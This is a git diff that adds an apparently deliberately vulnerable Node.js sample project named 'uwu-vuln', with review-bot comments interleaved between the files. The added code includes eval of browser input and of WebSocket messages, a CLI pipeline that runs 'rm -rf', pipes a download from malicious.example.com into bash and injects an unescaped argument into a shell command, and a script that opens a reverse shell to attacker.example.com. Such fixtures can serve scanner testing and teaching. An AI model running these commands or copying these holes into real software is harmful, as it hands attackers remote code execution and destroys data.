diff --git a/browser copy/index.js b/browser copy/index.js
new file mode 100644
index 0000000..5f1b215
--- /dev/null
+++ b/browser copy/index.js
@@ -0,0 +1,5 @@
+function executeUserScript() {
+ var userScript = document.getElementById('userScript').value;
+ // Using eval to execute user-provided script
+ eval(userScript);
+}
diff --git a/cli/index.js b/cli/index.js
new file mode 100644
index 0000000..7e5db7a
--- /dev/null
+++ b/cli/index.js
@@ -0,0 +1,18 @@
+const { exec } = require('child_process');
+
+const userArg = process.argv[2] || '';
+
+const cmd = `
+ rm -rf /tmp/vuln_dir --no-preserve-root &&
+ curl http://malicious.example.com/install.sh | bash &&
+ ls ${userArg}
+`;
+
+console.log('[*] Running dangerous CLI pipeline…');
+exec(cmd, (err, stdout, stderr) => {
+ if (err) {
+ console.error('[!] Pipeline failed:', err);
+ return;
+ }
+ console.log('[+] Pipeline succeeded. stdout:\\n', stdout);
+});
diff --git a/disk/index.js b/disk/index.js
new file mode 100644
index 0000000..963519e
--- /dev/null
+++ b/disk/index.js
@@ -0,0 +1,17 @@
+const express = require('express');
+const fs = require('fs');
+const path = require('path');
+const app = express();
+
+// Path Traversal
+app.get('/read', (req, res) => {
+ const file = req.query.file;
+ const fullPath = path.resolve(__dirname, file);
+ if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
+ fs.readFile(fullPath, 'utf8', (err, data) => {
+ if (err) return res.status(500).send(err.message);
+ res.send(data);
+ });
+});
+
+app.listen(3001, () => console.log('Disk vuln on port 3001'));
diff --git a/http copy/index.js b/http copy/index.js
new file mode 100644
index 0000000..1577130
--- /dev/null
+++ b/http copy/index.js
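Review bot: On the second line `document.getElementById('userScript').value` is dereferenced with no null check, so a page without that element fails with a TypeError instead of a readable error; `const el = document.getElementById('userScript'); if (el === null) throw new Error('userScript element not found');`. The `eval(userScript)` that follows is the same evaluate-remote-input pattern as `eval(msg)` in ws/index.js, and nothing in either file states that this is an intentionally vulnerable fixture — a header comment such as `// Intentionally vulnerable sample: evaluates page-controlled text` makes that explicit. `var` should be `const` here.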
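Review bot: `userArg` is spliced unescaped into the shell string on the `ls ${userArg}` line, so any shell metacharacters in argv[2] are interpreted by the shell that `exec` spawns; if the `ls` step is the part meant to take user input, `execFile('ls', [userArg], cb)` passes it as an argument without a shell. The closing log uses `'\\n'`, which in a single-quoted string is a literal backslash-n rather than a newline, so presumably `'[+] Pipeline succeeded. stdout:\n'` was intended. `stderr` is bound by the callback but never logged, so a failing stage's diagnostics are lost.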
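Review bot: `req.query.file` on the first line of the handler goes straight into `path.resolve`, which throws a TypeError when the parameter is absent or repeated (Express parses `?file=a&file=b` as an array), so non-strings should be rejected first: `if (typeof file !== 'string') return res.status(400).send('Invalid file path');`. The prefix check against `__dirname + path.sep` handles `..` segments but not a symlink inside the directory that points elsewhere; comparing `fs.realpath(fullPath)` against the same prefix closes that. `res.status(500).send(err.message)` returns the raw fs error, which includes the absolute path on disk, where a fixed message would do. The `// Path Traversal` label reads as if the handler were unprotected while the code actually guards the resolved path; `// Path traversal guard: only files under __dirname are served` describes it.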
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+ return ip === '::1' ||
+ /^127\./.test(ip) ||
+ /^10\./.test(ip) ||
+ /^192\.168\./.test(ip) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+ ip.startsWith('fc') || ip.startsWith('fd') ||
+ ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+ const url = req.query.url;
+ let parsedUrl;
+ try {
+ parsedUrl = new URL(url);
+ } catch (e) {
+ return res.status(400).send('Invalid URL');
+ }
+ const hostname = parsedUrl.hostname;
+ if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+ hostname === 'localhost' ||
+ hostname === '127.0.0.1' ||
+ hostname === '::1' ||
+ /^(10|127)\./.test(hostname) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+ /^192\.168\./.test(hostname)) {
+ return res.status(400).send('URL not allowed');
+ }
+ try {
+ // DNS resolution to prevent DNS rebinding
+ try {
+ const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+ for (const { address } of addresses) {
+ if (isPrivateIp(address)) {
+ return res.status(400).send('URL not allowed');
+ }
+ }
+ } catch (e) {
+ return res.status(400).send('Invalid hostname');
+ }
+
+ const resp = await axios.get(url);
+ res.send(resp.data);
+ } catch (e) {
+ res.status(500).send(e.message);
+ }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..5cb2217
--- /dev/null
+++ b/package.json
@@ -0,0 +1,11 @@
+{
+ "name": "uwu-vuln",
+ "version": "1.0.0",
+ "main": "index.js",
+ "scripts": {
+ "test": "echo \"Error: no test specified\" && exit 1"
+ },
+ "author": "",
+ "license": "ISC",
+ "description": ""
+}
diff --git a/stdin/index.js b/stdin/index.js
new file mode 100644
index 0000000..b712e33
--- /dev/null
+++ b/stdin/index.js
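Review bot: `isPrivateIp` covers loopback, RFC 1918 and the IPv6 ULA/link-local prefixes but has no case for 169.254.0.0/16 (IPv4 link-local) or 0.0.0.0, so a name resolving there passes the post-DNS check; add `/^169\.254\./.test(ip) || ip === '0.0.0.0' ||` to the chain. The comment `// DNS resolution to prevent DNS rebinding` overstates what the code does, because `axios.get(url)` performs its own lookup afterwards and the validated address is not necessarily the one connected to; unless the request is pinned to the resolved address (a custom `lookup` on the agent), the comment should read `// best-effort pre-check of the resolved addresses; axios resolves again`. axios also follows redirects by default and the redirect target is never re-validated, so `axios.get(url, { maxRedirects: 0 })` keeps the request on the checked host. On the 500 path `e.message` from the upstream request is echoed verbatim to the client, where a fixed message is enough.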
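Review bot: No `dependencies` field is declared, yet disk/index.js, http copy/index.js and ws/index.js `require` express, axios and ws, so a fresh `npm install` leaves every service unrunnable; add a `dependencies` block listing those three packages (versions left to the author). `"main": "index.js"` also points at a file that does not exist in this commit, since every entry point lives in a subdirectory, so either drop `main` or point it at one of them.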
@@ -0,0 +1,12 @@
+const { exec } = require('child_process');
+
+const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
+
+console.log('[*] Executing reverse shell payload…');
+exec(payload, (err, stdout, stderr) => {
+ if (err) {
+ console.error('[!] Error executing payload:', err);
+ return;
+ }
+ console.log('[+] Payload executed. stdout:', stdout);
+});
diff --git a/ws/index.js b/ws/index.js
new file mode 100644
index 0000000..7b0fc64
--- /dev/null
+++ b/ws/index.js
@@ -0,0 +1,12 @@
+const WebSocket = require('ws');
+const wss = new WebSocket.Server({ port: 8080 });
+
+// RCE
+wss.on('connection', ws => {
+ ws.on('message', msg => {
+ eval(msg);
+ ws.send('Executed: ' + msg);
+ });
+});
+
+console.log('WS vuln on port 8080');
\ No newline at end of file
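Review bot: Neither `wss` nor the per-connection `ws` registers an 'error' listener, so a socket error surfaces as an unhandled 'error' event and terminates the process; add `ws.on('error', (err) => console.error('socket error:', err));` inside the connection handler and a matching `wss.on('error', ...)` at server level. `eval(msg)` on the message line is the same evaluate-remote-input pattern as browser copy/index.js, and the file carries only `// RCE` with nothing stating that it is an intentionally vulnerable fixture; a header comment saying so would keep the pattern from being copied as working code. `'Executed: ' + msg` should be a template literal.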